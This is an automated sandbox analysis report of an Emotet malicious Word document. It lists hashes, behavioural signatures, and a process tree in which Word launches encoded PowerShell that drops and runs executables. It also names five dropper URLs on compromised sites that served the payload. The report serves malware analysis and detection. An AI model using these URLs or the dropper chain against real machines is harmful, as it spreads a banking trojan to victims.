Analysis

  • max time kernel: 25s
  • max time network: 21s
  • resource: win7v191014
  • submitted: 04-02-2020 20:58

General

  • Target: ba1ad7a3f3d3f24d4862ca8b73df68f7e30f04153cc87040d51e2943af746c09.doc
  • Sample: 200204-nbm656ce3a
  • SHA256: ba1ad7a3f3d3f24d4862ca8b73df68f7e30f04153cc87040d51e2943af746c09

Score
10/10

Malware Config

Extracted

Language: ps1

Source URLs (exe.dropper):

  • http://www.trinomulkantho.com/fkejsh742jdhed/uvb/
  • http://40ad.com/wp-admin/jktqs/
  • http://bestdiyprojects.info/wp-admin/GI/
  • https://zetalogs.com/wp-includes/UUO2l9rLzB/
  • https://beleze.com.br/social/KHp2ow/

Signatures

  • Blacklisted process makes network request (1 IoC)
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class (280 IoCs)
  • Suspicious use of WriteProcessMemory (1 IoC)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious use of SetWindowsHookEx (3 IoCs)
  • Process spawned unexpected child process (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Executes dropped EXE (2 IoCs)
  • Suspicious behavior: EmotetMutantsSpam (1 IoC)
  • Drops file in System32 directory (2 IoCs)
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ba1ad7a3f3d3f24d4862ca8b73df68f7e30f04153cc87040d51e2943af746c09.doc"
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2044
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e 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
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:784
  • C:\Users\Admin\824.exe
    C:\Users\Admin\824.exe
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious behavior: EmotetMutantsSpam
    • Drops file in System32 directory
    PID:1412
    • C:\Windows\SysWOW64\WMVSDECD\WMVSDECD.exe
      "C:\Windows\SysWOW64\WMVSDECD\WMVSDECD.exe"
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:2004

Network

MITRE ATT&CK Matrix

Downloads

  • C:\Users\Admin\824.exe
  • C:\Users\Admin\824.exe
  • C:\Windows\SysWOW64\WMVSDECD\WMVSDECD.exe
  • memory/1412-9-0x0000000000340000-0x000000000034C000-memory.dmp (Filesize: 48KB)
  • memory/1412-10-0x0000000000400000-0x0000000000466000-memory.dmp (Filesize: 408KB)
  • memory/2044-0-0x0000000000348000-0x0000000000350000-memory.dmp (Filesize: 32KB)
  • memory/2044-2-0x0000000007B00000-0x0000000007B04000-memory.dmp (Filesize: 16KB)
  • memory/2044-3-0x0000000007250000-0x0000000007450000-memory.dmp (Filesize: 2.0MB)
  • memory/2044-4-0x0000000008C3A000-0x0000000008C3E000-memory.dmp (Filesize: 16KB)
  • memory/2044-5-0x0000000008C3E000-0x0000000008C42000-memory.dmp (Filesize: 16KB)
  • memory/2044-6-0x00000000022F0000-0x00000000022F4000-memory.dmp (Filesize: 16KB)
  • memory/2044-7-0x0000000002370000-0x0000000002374000-memory.dmp (Filesize: 16KB)